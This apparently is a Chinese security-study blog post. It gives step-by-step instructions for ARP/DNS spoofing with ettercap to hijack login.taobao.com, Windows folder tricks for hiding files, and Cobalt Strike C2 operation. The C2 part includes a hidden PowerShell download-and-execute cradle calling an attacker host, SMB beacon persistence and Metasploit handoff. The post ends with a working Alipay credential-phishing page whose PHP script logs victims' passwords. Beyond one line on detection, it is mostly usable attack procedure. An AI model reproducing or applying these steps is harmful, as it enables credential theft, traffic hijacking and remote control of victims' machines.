1.27 arp欺骗和CS的使用

arp欺骗+dns欺骗

以下操作在kali2018中操作

攻击端操作

1
2
service apache2 start
echo 1 >> /proc/sys/net/ipv4/ip_forward

编辑 /etc/ettercap/etter.conf

把开头的两个设置为0,即:

1
2
3
[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

再把下面Linux部分的第二个,开头的注释删掉:

1
2
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport"

修改etter.dns,添加要劫持的网站的A记录到你的IP,例如:

1
login.taobao.com  A   [黑客ip]

ettercap -G 运行ettercap可视化窗口

sniff–unisniff–ok

host—host list—scan for hosts

网关–target1,目标–target2

mitm-arp posi…,选择第一个—ok

plugins—dns-spoofing双击

start–start sniff

如何识破?

arp -a

如果发现网关的地址和其中一个人的地址一样,说明被arp欺骗了

Windows bug利用

畸形文件夹

文件夹分身

创建文件夹md xxx..\

向其中添加文件后会分身出名为xxx的文件夹,且原文件夹无法删除

移除文件夹rd xxx..\

多重文件夹

创建文件夹md "\haha\ \"

向其中添加文件后发现里层的空文件夹也出现了该文件且无法删除

移除文件夹rd /s /q "c:\haha"

镜像文件夹(可能修复)

创建文件夹md c:\...\

打开文件夹里面是整个C盘的镜像,普通删除可能会损毁C盘

移除文件夹md c:\...\

文件隐藏

创建文件夹md a...\

复制文件到当中copy kfc.jpg c:\a...\kfc.jpg

只能通过伪协议访问:

file:///C:/a.../

修改文件夹为系统标识

1
2
3
4
5
6
7
8
9
重命名文件夹为以下:
我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
回收站.{645ff040-5081-101b-9f08-00aa002f954e}
拔号⽹络.{992CFFA0-F557-101A-88EC-00DD010CCC48}
打印机.{2227a280-3aea-1069-a2de-08002b30309d}
控制⾯板.{21ec2020-3aea-1069-a2dd-08002b30309d}
⽹上邻居.{208D2C60-3AEA-1069-A2D7-08002B30309D}
改回来:
rename 我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D} haha

Cobaltstrike的使用

cs属于c2软件

可以支持windows和linux,支持多人协作

使用Windows作为teamserver

先执行CMD添加密码

1
teamserver.bat Teamserver的IP 123456

启动teamserver

打开cobaltstrike.bat可以在windows上启动,ip填写Teamserver的IP,用户名随意密码123456

设置监听器Listener

add,reverse_http,主机写的是teamserver的ip,端口6666

配置payload

攻击,钓鱼攻击,脚本web传递可以生成木马传递命令,以供目标执行,如:

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.142.132:80/a'))"

目标运行脚本之后,黑客木马上线

选择目标,右键,进入beacon,先执行sleep 1等60s

(因为cs默认心跳包为60s)

之后就可以控制目标电脑

如果要删除目标,右键,先exit,再remove

也可以使用攻击,生成后门,exe格式的木马

使用Kali作为teamserver

linux的cs 4.1

开启端口是50050,不要写错

将teamserver文件的属性改为“可当作程序执行”

进入目录执行./teamserver [kali的ip] [密码]

  • 如果windows需要连接kali的cs

cobaltstrike.bat,输入ip是kali的ip

  • 如果linux连接cs

./cobaltstrike


利用smb beacon木马保留后门

监听器增加beacon smb,原有木马的基础之上,派生会话,选择smb的监听器

进入smb连接的木马

unlink 192.168.143.133 断开目标smb连接

进入原来的木马连接

link 192.168.143.133 恢复目标smb连接

cs+msf协同工作

外部监听器,打开msf

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost [kali的ip]

set lport 11111

exploit -j

cs的控制端

增加一个监听器payload为foreign_http

ip选择kali的,端口11111

选择被控制的目标,右键,派生会话,选择外部的监听器

此时msf就上线

对CS进行溯源反制

使用抓包看到黑客teamserver的ip地址,对黑客ip地址进行扫描

python csbruter.py -t 100 -p 端口 黑客IP pass.txt

有可能可以猜到黑客的teamserver的密码,然后自己使用cs去连接黑客的teamserver

邮件伪造

这部分在之前的文章中已有说明swaks伪造邮件

钓鱼网站(模板)

这部分在之前的文章中也有一个例子1.11 Linux提权(续)和钓鱼网站

这里做一个补充,再提供一个修改真实网页的例子


拓展补充:CSS选择器

ID 选择器(ID Selector):通过元素的唯一标识符(ID)选择 HTML 元素。

ID 选择器以 # 开头,后面跟着 ID 名称。


伪实战:以支付宝登录界面为例

打开到支付宝的登陆界面,右键选择“另存为”将网页保存到本地(文件名建议直接叫index),如果感觉原本的网站对引导用户输入用户名密码不够友好也可以先使用F12修改一些页面上的元素再保存(例如删去验证码登录和扫码登录)。

使用VS Code打开下载好的html文件,接下来一步一步来修改下面准备好的前后端模板:

  1. 在浏览器中使用F12定位到“邮箱地址/手机号”这个元素的id,这里是J-input-user

同理也分别找到密码输入框和登录按钮的id,是password_inputJ-login-simulate-btn

  1. 将收集到的信息填入到下面的前端脚本中
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
<script>
  $(document).ready(function(){
    //监听登录按钮事件
    $('#登录按钮id').click(function(event){
      //阻止默认的提交行为
      event.preventDefault();
      //获取用户名密码
      var username = $('#账号框id').val();
      var password = $('#密码框id').val();
      console.log(username);
      console.log(password);
      //使用ajax发送到post.php
      $.post('./post.php',{loginname:username,loginpassword:password},function(response){
        //console.log(response);
        alert("您输入的密码错误,请重新登录");
        window.location.replace("密码错误后的跳转链接");
      });
    });
  });
</script>

将改好的代码插入到html源代码中有关账号/密码框的代码的下方,前端校验的上方(如果有)。

  1. 再将这段引入js的代码插入到源代码中有关账号/密码框的代码的上方,为保险你也可以紧跟在<body>后面。
1
2
3
4
<script
  src="https://code.jquery.com/jquery-3.7.1.js"
  integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4="
  crossorigin="anonymous"></script>
  1. 在网站根目录中创建post.php文件,写入:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
<?php

$u = $_POST['loginname'];
$p = $_POST['loginpassword'];

$f = fopen('data.txt','a+');
fwrite($f,$u.'----'.$p."\n");
fclose($f);

?>
  1. 网页伪造完毕。

下面我们假装受害者来访问网站:受害者填入手机号18888888888和密码mypassword,点击登陆后网页弹窗提示密码错误,随后跳转到真正的支付宝。

服务端看到网站目录下生成了data.txt,里面有收集到的用户名和密码:

懒人工具:goblin 哥布林

下载链接:https://pan.baidu.com/s/1SH6CysBDVECgblIM8IZMqQ?pwd=u6rw

解压后运行会自动生成配置文件,打开它的goblin.yaml文件可以修改模仿的网站,访问每个网站上面的对应模仿地址即可查看效果。软件应该是采用本地代理转发加抓包的形式实现的,所以虽然对网页的模拟极为逼真(毕竟是代理原网页的),但是只要网页稍微有点防护就不行了,感兴趣自行尝试吧。


以上的钓鱼网站搭建和开头的arp+dns欺骗配合食用更加哦。

Licensed under CC BY-NC-SA 4.0
已存在于互联网
发表了126篇文章 · 总计210.25k字
萌ICP备20267077号
Powered by ctOS